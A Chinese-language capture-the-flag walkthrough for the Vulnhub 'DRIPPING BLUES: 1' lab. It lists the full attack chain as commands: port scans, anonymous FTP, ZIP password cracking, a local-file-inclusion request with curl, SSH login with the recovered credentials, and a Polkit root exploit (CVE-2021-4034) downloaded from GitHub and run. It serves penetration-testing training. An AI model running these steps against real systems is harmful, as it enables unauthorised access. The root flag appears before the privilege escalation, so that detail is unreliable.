【Vulnhub 靶场】DRIPPING BLUES: 1
字数 1674
更新时间 2025-08-12 18:43:32

DRIPPING BLUES: 1 靶机渗透测试教学文档

环境准备

靶机信息

  • 靶机名称:DRIPPING BLUES: 1
  • 操作系统:Ubuntu 20.04.1
  • 内核版本:Linux 5.11.0-34
  • 下载地址:https://www.vulnhub.com/entry/dripping-blues-1,744/

网络配置

  • 攻击机:Kali Linux (IP: 192.168.75.143)
  • 靶机:DHCP自动获取IP (最终确定为192.168.75.142)
  • 网络模式:NAT模式

信息收集阶段

1. 网络扫描

使用arp-scan发现靶机IP:

arp-scan -l

2. 端口扫描

全面扫描靶机开放端口:

nmap -p- -sV 192.168.75.142

扫描结果:

  • 21/tcp: vsftpd 3.0.3 (FTP服务)
  • 22/tcp: OpenSSH 8.2p1 (SSH服务)
  • 80/tcp: Apache httpd 2.4.41 (HTTP服务)

详细扫描:

nmap -A -p 1-65535 192.168.75.142

服务枚举与漏洞利用

1. FTP服务 (21端口)

匿名登录FTP

ftp 192.168.75.142
用户名:ftp 或 anonymous
密码:任意

获取文件

ls -la  # 查看文件
get respectmydrip.zip  # 下载文件

ZIP密码爆破

使用fcrackzip工具:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

爆破结果:密码为072528035

解压后得到:

  • respectmydrip.txt (提示关键词"drip")
  • secret.zip (需要进一步解压)

2. Web服务 (80端口)

网站分析

  • 首页被入侵者(travisscott和thugger)篡改
  • robots.txt内容:
    /dripisreal.txt
    /etc/dripispowerful.html
    

dripisreal.txt分析

  • 提示通过特定歌词页面计算MD5作为SSH密码
  • 歌词链接:https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
  • 示例:hellohellohellohello >> md5sum hellohellohellohello

本地文件包含漏洞

尝试访问/etc/dripispowerful.html

curl http://192.168.75.142/?drip=/etc/dripispowerful.html

发现被篡改内容,包含密码提示:imdrippinbiatch

3. SSH服务 (22端口)

使用获取的凭据登录:

ssh thugger@192.168.75.142
密码:imdrippinbiatch

登录后查找flag:

find / -name *.txt 2>/dev/null

发现:

  • /home/thugger/user.txt (内容:5C50FC503A2ABE93B4C5EE3425496521)
    • MD5解密为:toomanydrip
  • /root/root.txt (内容:78CE377EF7F10FF0EDCA63DD60EE63B8)

权限提升

系统信息收集

  • 内核版本:5.11.0-34
  • Sudo版本:1.8.31
  • 无gcc和make环境
  • Python版本:3.8.2

可用漏洞

  1. Linux DirtyPipe (CVE-2022-0847)
  2. Linux kernel权限提升 (CVE-2021-3493)
  3. Linux sudo权限提升 (CVE-2021-3156)
  4. Linux Polkit权限提升 (CVE-2021-4034)

选择Polkit提权

由于缺少编译环境,选择Polkit漏洞:

  1. 下载利用代码:
wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip
unzip master.zip
cd CVE-2021-4034-master/
  1. 执行提权:
python3 cve2021-4034.py
  1. 验证提权:
whoami  # 显示root

总结

渗透路径

  1. FTP匿名登录 → 获取ZIP文件 → 爆破解压 → 获取提示
  2. Web目录扫描 → 发现LFI漏洞 → 获取SSH密码
  3. SSH登录 → 查找flag → 发现提权线索
  4. 利用Polkit漏洞 → 获取root权限 → 读取root flag

关键点

  • FTP匿名访问是常见入口点
  • ZIP密码爆破使用rockyou字典
  • Web目录扫描和robots.txt分析很重要
  • LFI漏洞参数名需要尝试(drip)
  • 系统环境限制决定提权方式选择
  • Polkit漏洞利用不需要编译环境

获取的凭证

  • FTP: 匿名访问
  • SSH: thugger/imdrippinbiatch
  • User flag: 5C50FC503A2ABE93B4C5EE3425496521 (toomanydrip)
  • Root flag: 78CE377EF7F10FF0EDCA63DD60EE63B8
相似文章
相似文章
 全屏